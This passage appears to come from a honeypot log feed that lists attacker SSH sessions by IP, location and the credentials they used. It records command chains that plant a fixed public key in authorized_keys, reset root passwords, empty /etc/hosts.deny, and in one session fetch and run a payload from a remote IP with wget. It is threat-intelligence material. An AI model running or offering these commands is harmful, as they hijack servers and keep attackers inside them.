$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FmMUP333nXFD"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_117 (185.223.124.133) β€” Yerevan, Armenia Β· 2 sessions Β· 38 cmds
2026-05-13 07:54 EDT Β· as root/ines123, root/mustang
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:wYZ8ZUzOtLEd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:memPufpSoRqW"|chpasswd|bash
🎭 sakura_root_9 (43.167.9.7) β€” Tokyo, Japan Β· 2 sessions Β· 39 cmds
2026-05-12 08:17 EDT Β· as ali/Aa@123456, root/jboss@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Aa@123456\n3aMdZLqK91sb\n3aMdZLqK91sb"|passwd|bash
$ Enter new UNIX password:
$ echo "Aa@123456\n3aMdZLqK91sb\n3aMdZLqK91sb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ulAnD2H7nOlv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 cipher_root_97 (103.179.27.94) β€” Tulangbawang, Indonesia Β· 1 session Β· 20 cmds
2026-05-13 05:50 EDT Β· as ali/Aa@123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Aa@123456\nvLz428ZNHy8p\nvLz428ZNHy8p"|passwd|bash
$ Enter new UNIX password:
$ echo "Aa@123456\nvLz428ZNHy8p\nvLz428ZNHy8p\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_29 (180.76.53.39) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-13 05:49 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 shadow_root_94 (185.183.242.106) β€” Tashkent, Uzbekistan Β· 2 sessions Β· 40 cmds
2026-05-13 03:59 EDT Β· as aramos/aramos, ts3/ts3
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "aramos\nqAVH5FZcMSKo\nqAVH5FZcMSKo"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "aramos\nqAVH5FZcMSKo\nqAVH5FZcMSKo\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ts3\nkib4JWR5VH1R\nkib4JWR5VH1R"|passwd|bash
$ echo "ts3\nkib4JWR5VH1R\nkib4JWR5VH1R\n"|passwd
🎭 shadow_root_95 (13.228.8.1) β€” Singapore, Singapore Β· 2 sessions Β· 40 cmds
2026-05-13 04:03 EDT Β· as issabel/Itsemoemo2026@Washere2026, marko/marko123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "marko123\nFbWVOjQWpEJ4\nFbWVOjQWpEJ4"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "marko123\nFbWVOjQWpEJ4\nFbWVOjQWpEJ4\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Itsemoemo2026@Washere2026\netsLJE9pANVK\netsLJE9pANVK"|passwd|bash
$ echo "Itsemoemo2026@Washere2026\netsLJE9pANVK\netsLJE9pANVK\n"|passwd
🎭 poutine_root_5 (51.222.155.186) β€” Beauharnois, Canada Β· 2 sessions Β· 40 cmds
2026-05-13 04:02 EDT Β· as issabel/Itsemoemo2026@Washere2026, marko/marko123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Itsemoemo2026@Washere2026\nZXLH6CY29Rb8\nZXLH6CY29Rb8"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Itsemoemo2026@Washere2026\nZXLH6CY29Rb8\nZXLH6CY29Rb8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "marko123\nTTpuY4wSbUUE\nTTpuY4wSbUUE"|passwd|bash
$ echo "marko123\nTTpuY4wSbUUE\nTTpuY4wSbUUE\n"|passwd
🎭 wraith_root_100 (81.30.162.19) β€” Vinnytsia, Ukraine Β· 2 sessions Β· 40 cmds
2026-05-13 04:00 EDT Β· as aramos/aramos, ts3/ts3
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "ts3\nGRB6zXqnXFEM\nGRB6zXqnXFEM"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "ts3\nGRB6zXqnXFEM\nGRB6zXqnXFEM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "aramos\nib0i7Z7pA4Ah\nib0i7Z7pA4Ah"|passwd|bash
$ echo "aramos\nib0i7Z7pA4Ah\nib0i7Z7pA4Ah\n"|passwd
🎭 sakura_root_10 (165.154.231.236) β€” Tokyo, Japan Β· 1 session Β· 19 cmds
2026-05-13 03:47 EDT Β· as root/p4sswd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:tch20PL7W6J9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_21 (14.99.254.210) β€” Chennai, India Β· 1 session Β· 9 cmds
2026-05-13 03:42 EDT Β· as user2/Qwerty1
OS/kernel identification β†’ hostname discovery β†’ process termination β†’ make executable (world) β†’ execute payload
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
$ rm ./upnpsetup
$ wget -nc http://45.87.174.8/k.php?a=x86_64,2F3QFA5DB2W3QS3UH -O ./upnpsetup
$ chmod 777 ./upnpsetup // make executable (world)
$ sudo ./upnpsetup
$ ./upnpsetup // execute payload
🎭 silk_root_26 (220.154.131.111) β€” Qingdao, China Β· 1 session Β· 19 cmds
2026-05-13 00:53 EDT Β· as root/cream
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:6E0l1DK6nXCK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_27 (115.190.54.14) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-13 00:30 EDT Β· as root/jito
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:JDHXhP5PWiOa"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 blitz_root_17 (87.156.176.137) β€” Lauta, Germany Β· 1 session Β· 19 cmds
2026-05-12 19:55 EDT Β· as root/1qa2ws3ed4rf
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:aMQ1HmagEjXe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monet_root_8 (51.68.226.87) β€” Roubaix, France Β· 1 session Β· 19 cmds
2026-05-12 18:24 EDT Β· as root/simplepass
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:w9ilJBrOMKRS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_98 (165.154.6.126) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-12 18:19 EDT Β· as root/qazwsx12
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
